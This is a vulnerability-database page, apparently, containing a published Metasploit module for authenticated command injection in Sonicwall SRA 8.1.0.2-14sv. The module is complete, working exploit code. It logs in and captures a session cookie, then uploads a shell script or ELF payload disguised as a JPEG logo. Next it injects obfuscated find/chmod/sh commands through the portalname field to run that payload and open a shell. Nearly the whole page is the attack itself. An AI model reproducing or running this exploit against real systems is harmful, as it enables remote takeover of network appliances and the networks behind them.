DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:49", "references": [], "description": "\nSonicwall 8.1.0.2-14sv - sitecustomization.cgi Command Injection (Metasploit)", "edition": 1, "reporter": "xort", "exploitpack": {"type": "webapps", "platform": "cgi"}, "published": "2017-07-19T00:00:00", "title": "Sonicwall 8.1.0.2-14sv - sitecustomization.cgi Command Injection (Metasploit)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-07-19T00:00:00", "id": "EXPLOITPACK:757DD8C646E53115AB465EB50A87B025", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerablity \n# Date: 12/25/2016\n# Exploit Author: xort @ Critical Start\n# Vendor Homepage: www.sonicwall.com\n# Software Link: sonicwall.com/products/sra-virtual-appliance\n# Version: 8.1.0.2-14sv\n# Tested on: 8.1.0.2-14sv\n# \n# CVE : (awaiting cve)\n\n# vuln1: importlogo.cgi / logo1 parameter (any contents can be uploaded) \n# vuln2: sitecustomization.cgi / portalname (filename) parameter \n\n# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. \n#\n# xort @ Critical Start\n\n\n\n\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\tRank = ExcellentRanking\n\tinclude Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',\n\t\t\t\t\t'Description' => %q{\n\t\t\t\t\tThis module exploits a remote command execution vulnerability in\n\t\t\t\tthe Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in\n\t\t\t\ta section of the machine's adminstrative infertface for performing configurations \n\t\t\t\trelated to on-connect scripts to be launched for users's connecting.\t\n\t\t\t},\n\t\t\t'Author' =>\n\t\t\t\t[\n\t\t\t\t\t'xort@Critical Start', # vuln + metasploit module\n\t\t\t\t],\n\t\t\t'Version' => '$Revision: 1 $',\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'none', 'none'],\n\t\t\t\t],\n\t\t\t'Platform' => [ 'linux'],\n\t\t\t'Privileged' => true,\n\t\t\t 'Arch' => [ ARCH_X86 ],\n 'SessionTypes' => [ 'shell' ],\n 'Privileged' => false,\n\n\t\t 'Payload' =>\n { \n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n }\n },\n\n\t\t\t'Targets' =>\n\t\t\t\t[\n\t\t\t\t\t['Linux Universal',\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t'Arch' => ARCH_X86,\n\t\t\t\t\t\t\t\t'Platform' => 'linux'\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t'DefaultTarget' => 0))\n\n\t\t\tregister_options(\n\t\t\t\t[\n\t\t\t\t\tOptString.new('PASSWORD', [ false, 'Device password', \"\" ]),\t\n\t\t\t \tOptString.new('USERNAME', [ true, 'Device password', \"admin\" ]),\t\n\t\t\t\t\tOptString.new('CMD', [ false, 'Command to execute', \"\" ]),\t\n\t\t\t\t\tOpt::RPORT(443),\n\t\t\t\t], self.class)\n\tend\n\n def do_login(username, password_clear)\n vprint_status( \"Logging into machine with credentials...\\n\" )\n\n # vars\n timeout = 1550;\n\n # send request \n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => \"/cgi-bin/userLogin\",\n\t\t 'headers' => {\n\t\t\t 'Connection' => 'close',\n\t\t\t 'Content-Type' => 'application/x-www-form-urlencoded',\n\t\t\t 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',\n\t },\n 'vars_post' => {\n\t\t\t 'username' => username,\n\t\t\t 'password' => password_clear,\n\t\t\t 'domain' => 'LocalDomain',\n\t\t\t 'loginButton' => 'Login',\n\t\t\t 'state' => 'login',\n\t\t\t 'login' => 'true',\n\t\t\t 'VerifyCert' => '0',\n\t\t\t 'portalname' => 'VirtualOffice',\n\t\t\t 'ajax' => 'true'\n\t\t },\n }, timeout)\n\n\t\tswap = res.headers['Set-Cookie'].split('\\n').grep(/(.*)swap=([^;]+);/){$2}[0]\n\t\t\n return swap\n end\n\n def upload_payload(swap_cookie, file_data)\n vprint_status( \"Upload Payload...\" )\n\n # vars\n timeout = 1550;\n\n upload_req = [\n [ \"portalName\",\"VirtualOffice\" ],\n [ \"defaultLogo\",\"0\" ],\n [ \"uiVersion\",\"2\" ],\n [ \"bannerBackground\", \"light\" ]\n ]\n\n boundary = \"---------------------------\" + Rex::Text.rand_text_numeric(34)\n post_data = \"\"\n\n\t\t# assemble upload_req parms\n upload_req.each do |xreq|\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"#{xreq[0]}\\\"\\r\\n\\r\\n\"\n post_data << \"#{xreq[1]}\\r\\n\"\n end\n\n # add malicious file\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"logo1\\\"; filename=\\\"x.jpg\\\"\\r\\n\"\n\t\tpost_data << \"Content-Type: image/jpeg\\r\\n\\r\\n\"\n post_data << \"#{file_data}\\r\\n\"\n \n\t\tpost_data << \"--#{boundary}--\\r\\n\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"/cgi-bin/importlogo?uploadId=1\",\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => post_data,\n 'headers' =>\n {\n 'UserAgent' => \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0\",\n\t\t\t\t'Cookie' => 'swap='+swap_cookie+';',\n }\n }, timeout)\n \n\n end\n\n\n\tdef run_command(swap_cookie, cmd)\n\n\t\tvprint_status( \"Running Command...\\n\" )\n\n # vars\n timeout = 1550;\n\n\t\tvprint_status(\"creating filename on target: #{cmd}\\n\")\n\n upload_req = [\n [ \"portalname\", cmd ],\n [ \"portaltitle\",\"Virtual Office\" ],\n [ \"bannertitle\",\"Virtual Office\" ],\n [ \"bannermessage\",\"<h1>Dell Sonicwall</h1>\" ],\n [ \"portalUrl\",\"https://192.168.84.155/portal/xxx\" ],\n [ \"loginflag\",\"on\" ],\n [ \"bannerflag\",\"on\" ],\n [ \"httpOnlyCookieFlag\",\"on\" ],\n [ \"cachecontrol\",\"on\" ],\n [ \"uniqueness\", \"on\" ],\n [ \"duplicateLoginAction\", \"1\" ],\n [ \"livetilesmalllogo\", \"\" ],\n [ \"livetilemediumlogo\", \"\" ],\n [ \"livetilewidelogo\", \"\" ],\n [ \"livetilelargelogo\", \"\" ],\n [ \"livetilebackground\", \"#0085C3\" ],\n [ \"livetilename\", \"\" ],\n [ \"home2page\", \"on\" ],\n [ \"allowNetExtender\", \"on\" ],\n [ \"virtualpassagepage\", \"on\" ],\n [ \"cifsdirectpage\", \"on\" ],\n [ \"cifspage\", \"on\" ],\n [ \"cifsappletpage\", \"on\" ],\n [ \"cifsapplet\", \"on\" ],\n [ \"cifsdefaultfilesharepath\", \"\" ],\n [ \"home3page\", \"on\" ],\n [ \"showAllBookmarksTab\", \"on\" ],\n [ \"showDefaultTabs\", \"on\" ],\n [ \"showCopyright\", \"on\" ],\n [ \"showSidebar\", \"on\" ],\n [ \"showUserPortalHelpButton\", \"on\" ],\n [ \"userPortalHelpURL\", \"\" ],\n [ \"showUserPortalOptionsButton\", \"on\" ],\n [ \"homemessage\", \"<h1>Welcome to the Dell SonicWALL Virtual Office</h1>\" ],\n [ \"hptabletitle\", \"Virtual Office Bookmarks\" ],\n [ \"vhostName\", \"www.#{Rex::Text.rand_text_hex(32)}.com\" ],\n [ \"vhostAlias\", \"\" ],\n [ \"vhostInterface\", \"ALL\" ],\n [ \"vhostEnableKeepAlive\", \"on\" ],\n [ \"cdssodn\", \".yahoo.com\" ],\n [ \"enableSSLForwardSecrecy\", \"0\" ],\n [ \"enableSSLProxyVerify\", \"0\" ],\n [ \"sslProxyProtocol\", \"0\" ],\n [ \"loginSchedule\", \"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\" ],\n [ \"formsection\", \"main\" ],\n [ \"doAdd\", \"1\" ],\n [ \"cgiaction\", \"1\" ],\n [ \"themename\", \"stylesonicwall\" ],\n [ \"onlinehelp\", \"\" ],\n [ \"tmp_currentVhostName\", \"\" ],\n [ \"tmp_currentVhostAlias\", \"\" ],\n [ \"tmp_currentVhostInterface\", \"ALL\" ],\n [ \"tmp_currentVhostIp\", \"\" ],\n [ \"tmp_currentVhostIPv6\", \"\" ],\n [ \"tmp_currentVhostEnableHTTP\", \"0\" ],\n [ \"tmp_currentVhostEnableKeepAlive\", \"1\" ],\n [ \"tmp_currentVhostCert\", \"\" ],\n [ \"tmp_currEnforceSSLProxyProtocol\", \"0\" ],\n [ \"tmp_currSSLProxyProtocol\", \"0\" ],\n [ \"tmp_currEnableSSLProxyVerify\", \"0\" ],\n [ \"tmp_currEnableSSLForwardSecrecy\", \"0\" ],\n [ \"tmp_currentVhostOffloadRewrite\", \"\" ],\n [ \"restartWS\", \"1\" ],\n [ \"reuseFavicon\", \"\" ],\n [ \"oldReuseFavicon\", \"\" ],\n ]\n\n boundary = \"---------------------------\" + Rex::Text.rand_text_numeric(34)\n post_data = \"\"\n\n # assemble upload_req parms\n upload_req.each do |xreq|\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"#{xreq[0]}\\\"\\r\\n\\r\\n\"\n post_data << \"#{xreq[1]}\\r\\n\"\n end\n\n post_data << \"--#{boundary}--\\r\\n\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"/cgi-bin/sitecustomization\",\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => post_data,\n 'headers' =>\n {\n 'UserAgent' => \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0\",\n 'Cookie' => 'swap='+swap_cookie+';',\n }\n }, timeout)\n\tend\n\n\tdef run_command_file(swap_cookie)\n\n\t\t# use prefix so exploit can be re-used (unique portalname requirment)\n\t\tprefix = Rex::Text.rand_text_numeric(5)\n\n\t\trun_command(swap_cookie, \"#{prefix}$({find,$({perl,-e,'print(chr(0x2f))'}),-name,VirtualOffice.gif,-exec,cp,{},qz,$({perl,-e,'print(chr(0x3b))'})})\")\n\t\trun_command(swap_cookie, \"#{prefix}$({chmod,777,qz})\")\n\t\trun_command(swap_cookie, \"#{prefix}$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz})\")\n\n\tend\n\n\tdef exploit\n\t\t# timeout\n\t\ttimeout = 1550;\n\n\t\t# params\n\t\tpassword_clear = datastore['PASSWORD']\n\t\tuser = datastore['USERNAME']\n\n\t\t# do authentication\t\t\n\t\tswap_cookie = do_login(user, password_clear)\n\t\n\t\tvprint_status(\"authenticated 'swap' cookie: #{swap_cookie}\\n\")\n\t\t\t\n\t\t# pause to let things run smoothly\n\t\t#sleep(5)\n\n\t\t #if no 'CMD' string - add code for root shell\n if not datastore['CMD'].nil? and not datastore['CMD'].empty?\n\n cmd = datastore['CMD']\n\n # Encode cmd payload\n encoded_cmd = cmd.unpack(\"H*\").join().gsub(/(\\w)(\\w)/,'\\\\x\\1\\2')\n\n # kill stale calls to bdump from previous exploit calls for re-use\n upload_payload(swap_cookie, (\"sudo /bin/rm -f /tmp/n; printf \\\"#{encoded_cmd}\\\" > /tmp/n; chmod +rx /tmp/n; /tmp/n\" ))\n else\n # Encode payload to ELF file for deployment\n elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)\n encoded_elf = elf.unpack(\"H*\").join().gsub(/(\\w)(\\w)/,'\\\\x\\1\\2')\n\n\t\t\t# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)\n upload_payload(swap_cookie, (\"#!/bin/bash\\necho -e \\\"#{encoded_elf}\\\" > /tmp/m; chmod +rx /tmp/m; /tmp/m\"))\n run_command_file(swap_cookie)\n\n\t\t\t# wait for magic\n handler\n\t\t\t\n end\n\n\n\tend\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645483405}}

{}